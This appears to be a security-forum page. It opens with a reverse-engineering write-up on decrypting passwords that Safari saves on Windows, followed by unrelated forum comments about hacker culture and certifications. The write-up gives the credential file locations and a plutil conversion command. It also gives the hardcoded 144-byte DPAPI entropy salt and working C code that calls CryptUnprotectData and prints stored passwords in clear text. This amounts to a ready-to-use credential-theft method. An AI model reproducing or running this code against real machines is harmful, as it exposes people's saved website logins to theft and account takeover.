Safari features a good password manager with a better security model and encryption algorithms to keep it as secure as possible. Unlike other browsers such as Firefox and Chrome, you cannot see the stored passwords in Safari. You can enable or disable the Safari password manager by toggling the option through "Settings -> AutoFill -> Usernames & Passwords" (as shown below). Once enabled, Safari will prompt to save the password for every website login for the user. Upon confirmation, the website URL along with username & password are saved to a secret password file.

Safari stores all such web login passwords in a secret file named 'keychain.plist' at the following location (based on platform):

    [Windows XP] C:\Documents and Settings\<username>\Application Data\Apple Computer\Preferences
    [Windows Vista & Windows 7] C:\Users\<username>\AppData\Roaming\Apple Computer\Preferences

Safari stores the contents of 'keychain.plist' in the 'Binary Property List' file format, a variation of the Property List format used by Apple for storing binary data. Here is how a typical 'keychain' file will look.

Decoding the Safari 'Keychain' Secrets!

Looking at the above 'keychain file' content, there is hardly anything you can make out. The only hint that you get here is the 'bplist' keyword at the beginning of the file. After long hours searching on the 'bplist' keyword, I finally figured out the way to decode its content to a plain XML file. Apple provides the tool called 'plutil.exe' for playing with these 'Property List' files. You can find this console tool at the following location:

    [Windows x86] C:\Program Files\Common Files\Apple\Apple Application Support
    [Windows x64] C:\Program Files (x86)\Common Files\Apple\Apple Application Support

Here is the command to convert the cryptic 'keychain.plist' file to an easily readable 'keychain.xml' file:

    plutil.exe -convert xml1 -s -o c:\keychain.xml "c:\users\administrator\appdata\roaming\apple computer\preferences\keychain.plist"

This is how it will look after decoding to an XML file.

Internals of Safari Encryption Algorithm

The generated XML file (as shown above) contains encrypted password data along with website URL and username information. This stored password data is encoded using the BASE64 algorithm. Note that the original password data stored in the 'keychain.plist' file is not encoded with BASE64. When we convert it to XML using the Plutil tool, the encrypted password data is further encoded in BASE64 format. Once you decode the password using BASE64 you will see the original encrypted password data.

Safari uses the standard 'Windows Data Protection' mechanism (DPAPI) to encrypt the password data with a user isolation layer. Windows DPAPI provides functions like CryptProtectData/CryptUnprotectData for easy encryption/decryption of user oriented sensitive data such as passwords. Safari uses CryptProtectData along with static entropy (salt) to securely encrypt all website login passwords. Finally it is stored in the 'keychain.plist' file with the other user login information.

Decoding & Decryption of Safari Password

As mentioned in the previous section, successful password recovery will require the following 2 steps:

1. Base64 decoding of the password data from the XML file
2. Windows DPAPI decryption of the encrypted data

First you have to use a standard Base64 decoder algorithm to get the original password data from the encoded password bytes in the XML file. After that we have to perform decryption of this encrypted password data. In order to decrypt this encrypted password data we need to figure out the salt data used in CryptUnprotectData. Here is the salt data that I found during my reverse engineering work.

The entire salt generation algorithm and the decryption functions are within the Apple shared library 'CFNetwork.dll', which is present at the following location:

    [Windows x86] C:\Program Files\Common Files\Apple\Apple Application Support
    [Windows x64] C:\Program Files (x86)\Common Files\Apple\Apple Application Support

Here is the disassembly of CFNetwork.dll from IDA Pro showing the location of the salt generation & decryption function.

Initially the salt generation algorithm appeared to be dynamic, but after a few reversing sessions on different systems my doubts cleared and it was just static data. The salt data is 144 bytes in size and ends with the standard signature pattern 'com.apple.Safari' as shown in the above screenshot.
Once you get hold of the salt data, the encrypted password can easily be decrypted using the CryptUnprotectData function as shown below:

    BYTE salt[] = {
        0x1D, 0xAC, 0xA8, 0xF8, 0xD3, 0xB8, 0x48, 0x3E, 0x48, 0x7D, 0x3E, 0x0A, 0x62, 0x07, 0xDD, 0x26,
        0xE6, 0x67, 0x81, 0x03, 0xE7, 0xB2, 0x13, 0xA5, 0xB0, 0x79, 0xEE, 0x4F, 0x0F, 0x41, 0x15, 0xED,
        0x7B, 0x14, 0x8C, 0xE5, 0x4B, 0x46, 0x0D, 0xC1, 0x8E, 0xFE, 0xD6, 0xE7, 0x27, 0x75, 0x06, 0x8B,
        0x49, 0x00, 0xDC, 0x0F, 0x30, 0xA0, 0x9E, 0xFD, 0x09, 0x85, 0xF1, 0xC8, 0xAA, 0x75, 0xC1, 0x08,
        0x05, 0x79, 0x01, 0xE2, 0x97, 0xD8, 0xAF, 0x80, 0x38, 0x60, 0x0B, 0x71, 0x0E, 0x68, 0x53, 0x77,
        0x2F, 0x0F, 0x61, 0xF6, 0x1D, 0x8E, 0x8F, 0x5C, 0xB2, 0x3D, 0x21, 0x74, 0x40, 0x4B, 0xB5, 0x06,
        0x6E, 0xAB, 0x7A, 0xBD, 0x8B, 0xA9, 0x7E, 0x32, 0x8F, 0x6E, 0x06, 0x24, 0xD9, 0x29, 0xA4, 0xA5,
        0xBE, 0x26, 0x23, 0xFD, 0xEE, 0xF1, 0x4C, 0x0F, 0x74, 0x5E, 0x58, 0xFB, 0x91, 0x74, 0xEF, 0x91,
        0x63, 0x6F, 0x6D, 0x2E, 0x61, 0x70, 0x70, 0x6C, 0x65, 0x2E, 0x53, 0x61, 0x66, 0x61, 0x72, 0x69
    };

    //now decrypt the data
    DATA_BLOB DataIn;
    DATA_BLOB DataOut;
    DATA_BLOB OptionalEntropy;

    DataIn.pbData = byteEncBuffer;    //encrypted password data
    DataIn.cbData = dwEncBufferSize;  //encrypted password data size

    OptionalEntropy.pbData = (unsigned char*)&salt;
    OptionalEntropy.cbData = 144;

    if(CryptUnprotectData(&DataIn, 0, &OptionalEntropy, NULL, NULL,0, &DataOut) == FALSE )
    {
        printf("CryptUnprotectData failed = 0x%.8x", GetLastError());
        return FALSE;
    }

    //Decrypted data is in following format
    //Password Length [4 bytes] + Pass Data []
    BYTE *byteData = (BYTE *) DataOut.pbData;
    DWORD dwPassLen = byteData[0];
    memcpy(strPassword, &byteData[4], dwPassLen);
    strPassword[dwPassLen] = 0;

    printf("Decrypted Password %d - %s", dwPassLen, strPassword);

The above program initializes the salt data and then passes it to CryptUnprotectData along with the decoded password data to finally get the decrypted data. The first 4 bytes of this decrypted data contain the length of the ASCII password, and then follows the password in clear text! That is all it takes to successfully decrypt the password from the Safari store!
  18. But you should know the idea isn't that of the guy who wrote this code :D
  19. Ahead is right... most of them are wankers.

Off: The word "hacker" has a different meaning, or at least it's understood differently these days. You have a vulnerability found by one guy, a tool made by another... you know how to combine them all, you're a hacker... pff, it's nonsense. Ten years ago you'd proudly say "omg i hacked that" with your own two hands... a bit of deduction, a lot of skill and a bit of methodology; now what the hell can you say anymore. I'm not saying anything about crackers... that's probably why they gave up on cracking passwords, because now the guys doing reverse engineering have taken it over. I'm not saying anything about the so-called "ethical hackers", where over 90% of the tools they offer you in their "lab" are made by hackers and/or made at their request and later released publicly. Honestly I burst out laughing when the EC-Council guys beat their chests about being the first to bring out C|EH 7; moreover, their motto says it all, "Engineered by hackers, Presented by Professionals", while I proudly beat my chest that the kid recruited by Ligatt, who broke into a bank at 9 years old, pisses on C|EH 7. I'm not saying anything about their curriculum, especially the new types of vulnerabilities that appeared with the ARM platform and + many others... are missing.

On: This business about a quarter of them working for the FBI is pretty odd; I don't really believe it. No real "pro" would ever think of doing such a thing, it's not profitable, they stay anonymous and they're doing very well. I think most of them are ethicals (I recommend you watch a live course... if you can find one somewhere, you'll see that they present you a type of attack and the tool used, like nmap, ncat, at home or in the lab, and you have to practice the parameters and such nonsense, stuff for someone who has no idea what a network scanner is or rather what you do with it), or the kind of individuals the Americans like to call "ankle biters", who know how to do DDoS or any other "cliché" better than a certified FBI agent :)) I'm saying this because I don't believe in the "real deal" of this news item.

Considering that the USA boasts that every bit transferred to or from America passes by the "boys in white", they're doing a pretty bad job I'd say; the Anonymous guys would no longer be anonymous, the Europeans would have nothing left to steal from the Americans, whether media or anything else, "hackers" and all. I'm not saying it out of spite, I just gave my opinion... either these little hackers are not doing a good job or they recruited them to keep them in check; I rather "think" that the Chinese government pays hackers to attack other governments.
  20. Well, Oust, your ban is over ;)) You've come back with heavy weaponry, I see.
  21. Look, maestro, you've got loads of errors in the program.... try it with try, catch as...
  22. Yeah, it's a cool thing, I've known about it for about a month, since I was installing Chrome. I recommend everyone read it, there are some really interesting things :d
  23. And I'll help as much as I can... more on the programming side for the moment. I've looked through pretty much all the tutorials; a lot of what I know, and what everyone should know, is missing. Elementary things, gathered from my own experience, others from what I picked up on the web + what I combined together. There's no reason for RST to fall; for today's young people it would be 10 times easier to learn some things that we only found out about with difficulty, just as in fields like physics, astronomy etc. That's what I think team spirit should be, helping the next generation... as you've seen, a generation of hackers* is like a generation in football, it ends at around 30, and someone always has to be ready to take over the tasks, even when the "old" ones can hardly find the time among other concerns related to social life and age.
  24. haha I'm expecting an attack from D. Evans just as much as from Iran :))